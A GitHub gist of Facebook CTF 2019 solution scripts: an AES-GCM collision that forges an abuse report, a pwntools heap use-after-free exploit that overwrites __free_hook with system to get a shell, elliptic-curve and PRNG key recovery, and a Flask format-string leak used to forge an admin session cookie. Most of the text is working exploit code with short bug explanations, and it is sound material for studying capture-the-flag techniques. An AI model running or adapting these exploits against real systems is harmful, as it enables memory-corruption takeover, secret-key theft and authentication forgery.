Skip to content

Instantly share code, notes, and snippets.

@sylhare
Forked from niklasb/0_frank.sage
Created June 3, 2019 14:10
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save sylhare/c77c5620e6934b03fd67405b9c774fb8 to your computer and use it in GitHub Desktop.
Save sylhare/c77c5620e6934b03fd67405b9c774fb8 to your computer and use it in GitHub Desktop.
Facebook CTF 2019 solutions: frank, babylist, storagespace, netscream, keybaseish, events
'''
Impl of AES-GCM collision, section 3.1, https://eprint.iacr.org/2017/664.pdf
Use this, then send two messages to the bot with the same message ID
(& ciphertext) but different keys. I didn't include the code, but it is as
easy as changing the encrypt_inner and send functions to use hardcoded
inputs and outputs.
We will send a benign version of the message first, and then the abusive version.
The bot will look up the message by message ID as follows for reporting (client.py):
(_, ts, ctxt, msg, fbtag) = [
x for x in self._all_messages[who] if x[0] == mid
][0]
We will have two messages with the same ID in this list, but the first one
is benign, so the report will be invalid and we get the flag.
Pseudocode encryption:
M = input message
kf, km = random keys
fbtag_key = server secret
# inner encryption with ephemeral key
cm = AES(key=km, M)
publish cm under message ID mid # <- this is the ciphertext that we reuse twice
# outer encryption (end-to-end)
M' = mid + km + H(cm)
com = HMAC(key=kf, M')
ctxt = RSA(M' + kf)
publish ctxt + com # <- this part we change between messages
# (specifically, we change km and compute
# a new commitment)
# server
fbtag = HMAC(key=fbtag_key, com + sender + receiver + time())
publish fbtag
'''
import Crypto.Cipher.AES as AES
from Crypto.Util import Counter
from Crypto.Util.number import bytes_to_long, long_to_bytes
import random
import sys
import requests
import socket
import itertools
# Sage preparser syntax: GF(2), its polynomial ring in X, and the field
# GF(2^128) with modulus X^128 + X^7 + X^2 + X + 1 (generator named A).
# The GHASH helpers below do all of their arithmetic in FF.
F = GF(2)
BF.<X> = F[]
FF.<A> = GF(2 ^ 128, modulus=X ^ 128 + X ^ 7 + X ^ 2 + X + 1)
# helpers
def str2bits(str):
    """Expand a string into a flat list of bits, most significant bit first.

    Each character contributes its ordinal as a binary number zero-padded
    to at least 8 digits.
    """
    bits = []
    for ch in str:
        bits.extend(int(digit) for digit in format(ord(ch), '08b'))
    return bits
def int2ele(integer):
    """Map a 128-bit integer to an element of FF.

    Bit ``pos`` of ``integer`` (counting from the least significant bit)
    becomes the coefficient of A^(127 - pos), i.e. the rightmost bit is x127.
    ``^`` is exponentiation here (Sage preparser).
    """
    return sum(
        ((integer >> pos) & 1) * (A ^ (127 - pos))
        for pos in range(128)
    )
def ele2int(element):
    """Inverse of int2ele: return the element's 128 coefficient bits mirrored.

    The integer representation is read bit by bit from the low end and
    pushed into the result from the low end, which reverses the bit order.
    """
    remaining = element.integer_representation()
    mirrored = 0
    for _ in range(128):
        # shifting leaves bit 0 clear, so OR-ing in the next bit equals adding it
        mirrored = (mirrored << 1) | (remaining & 1)
        remaining >>= 1
    return mirrored
def str2ele(s):
    """Convert one 16-byte block into a field element via int2ele."""
    block_len = len(s)
    assert block_len == 16
    as_int = bytes_to_long(s)
    return int2ele(as_int)
def ele2str(x):
    """Serialize a field element to bytes, front-padded to a 16-byte block."""
    as_int = ele2int(x)
    return long_to_bytes(as_int, 16)
# AES-GCM implementation
def compute_tag(H, K0, txt):
    """Compute the authentication tag of ``txt`` as an integer.

    H   -- hash key as a field element (see get_hash_key)
    K0  -- 16-byte mask block added at the end (see get_k0)
    txt -- byte string to authenticate; zero-padded to a multiple of 16 bytes

    Each block is absorbed as ``acc = (acc + block) * H``, followed by the
    bit length of the unpadded text, and finally K0 is added.
    """
    bit_len = 8 * len(txt)
    padded = txt
    while len(padded) % 16 != 0:
        padded += '\0'
    assert len(padded) % 16 == 0
    acc = 0
    for offset in range(0, len(padded), 16):
        block = padded[offset:offset + 16]
        acc = (acc + int2ele(bytes_to_long(block))) * H
    acc = (acc + int2ele(bit_len)) * H
    acc += int2ele(bytes_to_long(K0))
    return ele2int(acc)
def xor(a, b):
return ''.join(chr(ord(x)^^ord(y)) for x, y in zip(a,b))
def get_k0(key, iv):
    """Return the AES-ECB encryption of the 16-byte block ``(iv << 32) | 1``.

    This is the mask block that compute_tag adds as its last step.
    """
    nonce = bytes_to_long(iv)
    first_counter_block = long_to_bytes((nonce << 32) | 1, 16)
    return AES.new(key, AES.MODE_ECB).encrypt(first_counter_block)
def get_hash_key(key):
    """Return the hash key H: AES-ECB of the all-zero block, as a field element."""
    zero_block = '\0'*16
    encrypted = AES.new(key, AES.MODE_ECB).encrypt(zero_block)
    return int2ele(bytes_to_long(encrypted))
# sanity check
def encrypt2(key, iv, plaintext):
    """Reference AES-GCM encryption using the ``cryptography`` package.

    Returns ``(ciphertext, tag)``; used by encrypt() as a sanity check.
    """
    from cryptography.hazmat.backends import default_backend
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    cipher = Cipher(algorithms.AES(key), modes.GCM(iv), backend=default_backend())
    encryptor = cipher.encryptor()
    body = encryptor.update(plaintext)
    body += encryptor.finalize()
    return body, encryptor.tag
def encrypt(key, iv, plaintext):
    """Hand-rolled AES-GCM encryption, cross-checked against encrypt2().

    key must be 16 bytes and iv 12 bytes. Returns ``(ciphertext, auth_tag)``
    where auth_tag is an integer below 2**128. Asserts that both values agree
    with the reference implementation.
    """
    ref_ct, ref_tag = encrypt2(key, iv, plaintext)
    assert len(key) == 16
    ecb = AES.new(key, AES.MODE_ECB)
    H = get_hash_key(key)
    assert len(iv) == 12
    nonce = bytes_to_long(iv)
    true_len = len(plaintext)
    padded = plaintext
    while len(padded) % 16:
        padded += '\0'
    pieces = []
    for idx in range(len(padded) // 16):
        # data counters start at 2; counter value 1 is used by get_k0
        keystream = ecb.encrypt(long_to_bytes((nonce << 32) | (idx + 2), 16))
        pieces.append(xor(padded[idx * 16:(idx + 1) * 16], keystream))
    ciphertext = ''.join(pieces)[:true_len]
    K0 = get_k0(key, long_to_bytes(nonce, 16))
    auth_tag = compute_tag(H, K0, ciphertext)
    assert auth_tag < (1 << 128)
    assert ciphertext == ref_ct
    assert int(ref_tag.encode('hex'), 16) == auth_tag
    return ciphertext, auth_tag
class TagError(Exception):
    """Raised by decrypt() when the supplied tag does not match the ciphertext."""
def decrypt(key, iv, ciphertext, auth_tag):
    """Hand-rolled AES-GCM decryption (counterpart of encrypt()).

    key must be 16 bytes and iv 12 bytes; auth_tag is the integer tag as
    returned by encrypt() / compute_tag().

    Returns the plaintext, which has exactly the same length as ciphertext.
    Raises TagError when auth_tag does not match the ciphertext.
    """
    assert len(key) == 16
    aes_ecb = AES.new(key, AES.MODE_ECB)
    H = get_hash_key(key)
    assert len(iv) == 12
    iv = bytes_to_long(iv)
    len_ct = len(ciphertext)

    # The tag covers the unpadded ciphertext; verify it before decrypting.
    K0 = get_k0(key, long_to_bytes(iv, 16))
    expected_auth_tag = compute_tag(H, K0, ciphertext)
    if auth_tag != expected_auth_tag:
        raise TagError

    padded = ciphertext
    while len(padded) % 16:
        padded += '\0'
    plaintext = ''
    for i in range(len(padded) // 16):
        # data counters start at 2; counter value 1 is used by get_k0
        ctr_block = aes_ecb.encrypt(long_to_bytes((iv << 32) | (i + 2), 16))
        plaintext += xor(padded[i*16:(i+1)*16], ctr_block)
    # Drop the bytes produced by the zero padding so that a ciphertext whose
    # length is not a multiple of 16 does not yield trailing keystream bytes.
    return plaintext[:len_ct]
def collide_gcm(key1, key2, iv, ciphertext):
    """Extend ``ciphertext`` by one block so its tag is equal under both keys.

    ciphertext must be a multiple of 16 bytes. The tag is a polynomial in the
    hash key; setting tag(key1) + tag(key2) = 0 and solving for the last
    block (whose coefficient is H^2) gives the block to append.
    ``^`` is exponentiation here (Sage preparser).

    Returns ``(extended_ciphertext, tag)`` with tag computed under key1.
    """
    nonce = bytes_to_long(iv)
    first_counter_block = long_to_bytes((nonce << 32) | 1, 16)
    ecb1 = AES.new(key1, AES.MODE_ECB)
    ecb2 = AES.new(key2, AES.MODE_ECB)
    H1 = get_hash_key(key1)
    H2 = get_hash_key(key2)
    P1 = str2ele(ecb1.encrypt(first_counter_block))
    P2 = str2ele(ecb2.encrypt(first_counter_block))
    assert len(ciphertext) % 16 == 0
    # number of blocks including the one about to be appended
    mlen = len(ciphertext) // 16 + 1
    # length term already accounts for the extra 128 bits
    lens = int2ele(8 * len(ciphertext) + 128)
    acc = lens * (H1 + H2) + P1 + P2
    for idx in range(mlen - 1):
        power = mlen + 1 - idx
        block = str2ele(ciphertext[idx * 16:(idx + 1) * 16])
        acc = acc + block * (H1^power + H2^power)
    last_block = acc * (H1^2 + H2^2)^(-1)
    Ca = ciphertext + ele2str(last_block)
    K0 = get_k0(key1, long_to_bytes(nonce, 16))
    return Ca, compute_tag(H1, K0, Ca)
iv = b'a'*12
key1 = b'b'*16
key2 = b'c'*16
plaintext = b'abuse'
plaintext += b'a'*(32-len(plaintext))
ct, tag = encrypt(key1, iv, plaintext)
assert plaintext == decrypt(key1, iv, ct, tag)
ct2, tag2 = collide_gcm(key1, key2, iv, ct)
pt1 = decrypt(key1, iv, ct2, tag2)
pt2 = decrypt(key2, iv, ct2, tag2)
tag2 = long_to_bytes(tag2)
assert len(tag2) == 16
print 'pt1 = b%r' % pt1
print 'pt2 = b%r' % pt2
print 'tag = b%r' % tag2
print 'ct = b%r' % ct2
print 'iv = b%r' % iv
'''
Bug: The duplicate command memcpys one std::vector over another one,
which is... not recommended. After resizing the first one the second one points
to UAF memory. We can use this to leak and then overwrite a List object.
'''
import struct
from pwn import *
def connect():
    """Connect to the challenge service and wait for the first menu prompt.

    The tube is stored in the module-level ``r`` that all helpers use.
    """
    global r
    # r = remote('localhost', 4444)
    host, port = 'challenges.fbctf.com', 1343
    r = remote(host, port)
    r.recvuntil('> ')
def create(name):
    """Menu option 1: send ``name`` at the 'list:' prompt, then wait for the menu."""
    exchange = (('1', 'list:\n'), (name, '> '))
    for payload, prompt in exchange:
        r.sendline(payload)
        r.recvuntil(prompt)
def add(listidx, num, wait=True):
    """Menu option 2: add ``num`` to list ``listidx``.

    ``num`` is given as an unsigned 32-bit value and reinterpreted as signed
    before being sent in decimal. With ``wait=False`` the function returns
    without waiting for the next menu prompt.
    """
    (signed,) = struct.unpack('<i', struct.pack('<I', num))
    r.sendline('2')
    r.recvuntil('list:\n')
    r.sendline(str(listidx))
    r.recvuntil('add:\n')
    r.sendline(str(signed))
    if not wait:
        return
    r.recvuntil('> ')
def view(listidx, i):
    """Menu option 3: read entry ``i`` of list ``listidx`` and return it as an int."""
    exchange = (
        ('3', 'list:\n'),
        (str(listidx), 'list:\n'),
        (str(i), ' = '),
    )
    for payload, prompt in exchange:
        r.sendline(payload)
        r.recvuntil(prompt)
    raw = r.recvuntil('\n').strip()
    r.recvuntil('> ')
    return int(raw)
def duplicate(listidx, name):
    """Menu option 4: duplicate list ``listidx`` under the new name ``name``."""
    exchange = (
        ('4', 'list:\n'),
        (str(listidx), 'list:\n'),
        (name, '> '),
    )
    for payload, prompt in exchange:
        r.sendline(payload)
        r.recvuntil(prompt)
def remove(listidx):
    """Menu option 5: send the index ``listidx``, then wait for the menu."""
    exchange = (('5', 'list:\n'), (str(listidx), '> '))
    for payload, prompt in exchange:
        r.sendline(payload)
        r.recvuntil(prompt)
def more(listidx, num, wait=True):
for i in range(num):
print i
add(listidx, 0xbadbeef, wait=wait)
# Exploit driver. The trailing "# N" comments give the index of each list.
# Statement order matters: every create/add/duplicate shapes the heap.
connect()
# Stage 1: duplicate a small list, then grow the original so the copy is left
# pointing at stale memory (see the bug description above).
create('leak1') # 0
more(0, 3)
duplicate(0, 'leak1x') # 1
more(0, 2)
# Combine the first two 32-bit entries of the stale copy into one 64-bit value.
leak = view(1,0) + 2**32*view(1,1)
# NOTE(review): the two constants look like a leaked value and the matching
# heap base recorded in a debugging session -- confirm against the target.
heap = leak - 0x55555576af20 + 0x0000555555759000
print 'heap @',hex(heap)
# Stage 2: same trick with a much larger list (512 entries).
create('leak2') # 2
more(2, 512)
duplicate(2, 'leak2x') # 3
more(2, 1)
leak = view(3,0) + 2**32*view(3,1)
# NOTE(review): constants presumably are a leaked pointer and the libc base
# from the same debugging session -- confirm for the libc in use.
libc = leak - 0x7ffef7829ca0 + 0x00007ffff743e000
print 'libc @',hex(libc)
# Stage 3: list 4 starts with the bytes 'sh\0\0' packed as a 32-bit integer.
create('bar') # 4
add(4, struct.unpack('<i', 'sh\0\0')[0])
more(4, 16)
duplicate(4, 'baz') # 5
more(4, 16)
create('lul') # 6 -> victim
# Advance pointer of the UAF array until begin pointer of array 6
more(5, 11)
# Write-what-where by overwriting begin ptr
where = libc + 0x7ffff782b8e8 - 0x00007ffff743e000 # __free_hook
what = libc + 0x7ffff748d440 - 0x7ffff743e000 # system
# Each 64-bit field is written as two 32-bit adds: low half, then high half.
# begin
add(5, 0)
add(5, 0)
# end
add(5, where % 2**32)
add(5, where // 2**32)
# end_capacity
where += 100
add(5, where % 2**32)
add(5, where // 2**32)
# Adding to the victim list now stores `what` at `where`.
add(6, what % 2**32)
add(6, what // 2**32)
# trigger free('sh\0')
more(4, 32, wait=False)
r.interactive()
'''
Insight here was that the order of the generator is only 128 bit and
has small prime factors, thus we can use Pohlig-Hellman to solve dlog
and derive the key from the equation G*key = H.
'''
import random
import base64
import json
import hashlib
from pwnlib.tools import * # from https://github.com/niklasb/ctf-tools
from sage.all import EllipticCurve, GF, proof, factor
# NOTE(review): connect/ru/sendln/readln presumably come from the
# `pwnlib.tools` star import above -- confirm.
connect()
ru('> ')
print 'getting params'
# Ask the service to sign an "info" command, read back one line and replay it.
sendln('{"command":"sign", "params":{"command":"info"}}')
cmd = readln()
ru('> ')
sendln(cmd)
# Parse the curve parameters from the reply. Each ru() reads up to a
# delimiter and the slice drops that delimiter before int().
ru('x**3 + ')
a = int(ru('*')[:-1])
ru('+ ')
b = int(ru(' ')[:-1])
ru('mod ')
mod = int(ru(')')[:-1])
# first point: generator G
ru(': (')
gx = int(ru(', ')[:-2])
gy = int(ru(')')[:-1])
# second point: H (G*key == H is asserted below)
ru(': (')
hx = int(ru(', ')[:-2])
hy = int(ru(')')[:-1])
# The previous proof setting is saved but not restored in this script.
prev_proof_state = proof.arithmetic()
proof.arithmetic(False) # turn off primality checking
FF = GF(mod)
EC = EllipticCurve([FF(a), FF(b)])
G = EC(gx, gy)
H = EC(hx, hy)
n = G.order()
print 'computing dlog'
print 'order', n
print 'order factors', factor(n)
# Recover the private key as the discrete log of H to base G.
key = G.discrete_log(H)
print 'done', key
assert G*key == H
def sign(message, key):
    """Sign ``message`` with private scalar ``key``; return the pair ``(r, s)``.

    Uses the module-level curve data:
    n: curve order
    G: generator

    r is the SHA-256 of the message concatenated with the decimal x-coordinate
    of G*k for a random k, and s = (k - r*key) mod n. Retries until neither
    r mod n nor s is zero.
    """
    while True:
        nonce = random.randint(1, n)
        x_coord = int((G * nonce)[0])
        digest = hashlib.sha256(message + str(x_coord)).hexdigest()
        r = int(digest, 16)
        if r % n != 0:
            s = (nonce - (r * key)) % n
            if s != 0:
                return (r, s)
# Build the "flag" command and sign its canonical (sorted-keys) JSON form.
request = {
'command': 'flag',
'params': {
'name': 'fbctf'
}
}
text = json.dumps(request, sort_keys=True)
r, s = sign(text, key)
# The signature travels as base64("<r>|<s>") in the 'sig' field.
sig = base64.b64encode((str(r) + '|' + str(s)))
request['sig'] = sig
sendln(json.dumps(request))
interact()
'''
Key insight here was that the AES encryption was actually skipped due to use
of a shared global variable. Thus we directly get the PRNG output as the
IV in the "enc" file, which just has 2 bytes missing that we can brute force
to reconstruct the entire stream.
Pseudocode of binary logic:
rand():
return random 256-bit number
setup():
<initialize curve and point P>
r = rand()
new_key(): # PRNG implementation
xs = []
for i := 0 to 1: # run twice...
r = (G*r).x
xs.push((P*r).x)
return bottom 30 bytes of xs[0] + bottom 2 bytes of xs[1]
setup()
plain = read file argv[1]
ivec = new_key()
key = new_key()
cipher = aes_ige(plain, iv=ivec, key=key)
write key to file "key"
write ivec + cipher to file "enc"
'''
from IPython import embed
# from https://github.com/Surye/telepy/blob/master/crypt.py with small fixes
from ige import ige_decrypt
# Curve parameters: field prime, coefficient a = p - 3, and coefficient b.
p256 = 115792089210356248762697446949407573530086143415290314195533631308867097853951L
a256 = p256 - 3
b256 = 41058363725152142129326129780047268409114441015993725554835256314039467401291L
## base point values
gx = 48439561293906451759052585252797914202762949526041747995844080717082404635286L
gy = 36134250956749795798585127919587881956611106672985015071877198253568414405109L
## order of the curve
qq = 115792089210356248762697446949407573529996955224135760342422259061068512044369L
# The previous proof setting is saved but not restored in the code shown here.
prev_proof_state = proof.arithmetic()
proof.arithmetic(False) # turn off primality checking
FF = GF(p256)
EC = EllipticCurve([FF(a256), FF(b256)])
# Supply the known order so it does not have to be computed.
EC.set_order(qq)
# Polynomial ring in Y over FF (Sage preparser syntax); used by point().
_.<Y> = FF[]
def f(x):
    """Right-hand side of the curve equation: x^3 + a256*x + b256."""
    cube = x * x * x
    return cube + a256 * x + b256
def point(x):
    """Return a curve point whose x-coordinate is ``x``.

    Takes the first root of Y^2 - f(x); indexing the root list raises
    IndexError when there is no root.
    """
    fx = FF(x)
    candidates = (Y * Y - f(fx)).roots()
    y_coord = candidates[0][0]
    return EC(fx, y_coord)
# define the base point
G = EC(FF(gx), FF(gy))
# Second point P and the scalar d linking it to G (checked by the assert).
x = 0xF6C4F766B3C61F09E609582224CC8EBCCF4CD4961EF780CC02E8F09A0EFA7CA5
y = 0xF212C5768D46716C6CAC4D23FF12E8AE89FD9EEEC83A0E83E35DB3AADE0CCB5B
d = 0x6FC45453894DE99C661581B0A12087B862667B785AABA7116DCDCB3CB3A79AFE
P = EC(FF(x), FF(y))
assert G == P*d
# assert (G*3)*2 == G*(3*2)
# assert (G*100)*200 == G*(100*200)
# exit()
# Read the challenge file with a context manager so the handle is closed.
with open('dist/enc', 'rb') as enc_file:
    enc = enc_file.read()
# actual_key = open('dist/test/key', 'rb').read()
actual_key = None
# File layout: 32-byte ivec followed by the ciphertext.
ivec = enc[:32]
cipher = enc[32:]
# First 30 and last 2 bytes of the ivec as big-endian integers.
x1_lo = int(ivec[:30].encode('hex'),16)
x2_lo = int(ivec[30:].encode('hex'),16)
# Brute-force range for the 16 missing bits; narrowed to the known hit.
# L, R = 0, 2**16
L, R = 5245, 5246
def to_bytes(x, sz):
    """Encode the non-negative integer ``x`` as exactly ``sz`` big-endian bytes.

    Raises AssertionError when ``x`` does not fit into ``sz`` bytes.
    """
    import binascii  # local import keeps this helper self-contained
    width = int(sz * 2)
    # '%x' never emits a '0x' prefix or an 'L' suffix, so nothing needs to be
    # stripped; zfill restores the leading zeros.
    h = ('%x' % int(x)).zfill(width)
    assert len(h) == width
    return binascii.unhexlify(h)
def check(X1):
res = [X1]
for i in range(10):
R = res[-1]*d
r = int(R[0])
X = P*r
res.append(X)
res = [int(X[0]) for X in res]
stream = ''
i = 0
while i + 1 < len(res):
stream += to_bytes(res[i] & ((1<<240)-1), 30)
stream += to_bytes((res[i + 1] >> 224) & 0xffff, 2)
i += 2
assert stream[:32] == ivec
key = stream[32:64]
if actual_key != None:
assert stream[32:64] == actual_key
print ige_decrypt(cipher, key, ivec)
for i in xrange(L, R):
if i % 1000 == 0:
print i
sys.stdout.flush()
x1 = x1_lo + (i << 240)
try:
X1 = point(x1)
except:
continue
R2 = X1*d
r2 = int(R2[0])
X2 = P*r2
x2 = int(X2[0])
if ((x2 >> 224) & 0xffff) == x2_lo:
print 'YES', i
sys.stdout.flush()
check(X1)
# Trick here was to use a small e and just chose the modulus based on the PIN
# assembled from https://twitter.com/baseishcoinfou1
X = 43522081190908620239526125376626925272670879862906206214798620592212761409287968319160030205818706732092664958217053982767385296720310547463903001181881966554081621263332073144333148831108871059921677679366681345909190184917461295644569942753755984548017839561073991169528773602380297241266112083733072690367
pin = 672241
e = 4
# Choose N so that X**e leaves remainder `pin` modulo N.
Y = X**e
N = Y - pin
# trivially, Y % N == pin
# Output format is "<e>:<N>".
print '{}:{}'.format(e, N)
#!/usr/bin/env python3
'''
Step 1: get the secret key via format string injection:
event_name=a&event_address=b&event_important=__init__.__globals__[app].__dict__
I believe the server side has super weird code like:
event = Event(name='a', address='b') # sqlalchemy object
...
output += ('<li>{event.' + request.query['event_important'] + '}</li>').format(event=event)
THIS MUST BE RUN WITH PYTHON 3!
We learned the hard way that itsdangerous behavior varies between Python 2 and 3
'''
import requests
import base64
import hashlib
from itsdangerous import URLSafeTimedSerializer
from flask.sessions import TaggedJSONSerializer
# Just a random, valid session cookie
cookie = '.eJwlzj0OwjAMBtC7ZO7gOD-f3ctUdpwI1pZOiLuDxP6G907HOuf1SPvrvOeWjmekPXmjBQbIFohFYDMyqrOwc0En7TZyj7WKmsUQg2elusQURvEDYiyeSx5aa5-AiZKFuSvI2yDlrq2we5OgNWRYIGNMU4akLd3XPP-ZDKTPF8WzLyY.XPQOsQ.afA_iiPuSMB3xfj788GGmt7pgBI'
# Signing key used by sign() below.
# NOTE(review): presumably the value leaked in step 1 of the writeup -- confirm.
secret_key=b'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'
def sign(values):
    """Serialize and sign ``values`` with ``secret_key``.

    Uses URLSafeTimedSerializer with the 'cookie-session' salt, HMAC key
    derivation, SHA-1 digest and Flask's TaggedJSONSerializer.
    """
    cookie_serializer = URLSafeTimedSerializer(
        secret_key,
        salt='cookie-session',
        serializer=TaggedJSONSerializer(),
        signer_kwargs={
            'key_derivation': 'hmac',
            'digest_method': hashlib.sha1,
        },
    )
    return cookie_serializer.dumps(values)
# Forged value for the 'user' cookie.
user = sign('admin')
def check():
    """Request /flag with the session cookie and forged 'user' cookie; return the body text."""
    jar = {
        'events_sesh_cookie': cookie,
        'user': user,
    }
    response = requests.get('http://challenges.fbctf.com:8083/flag', cookies=jar)
    return response.text
print(check())
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment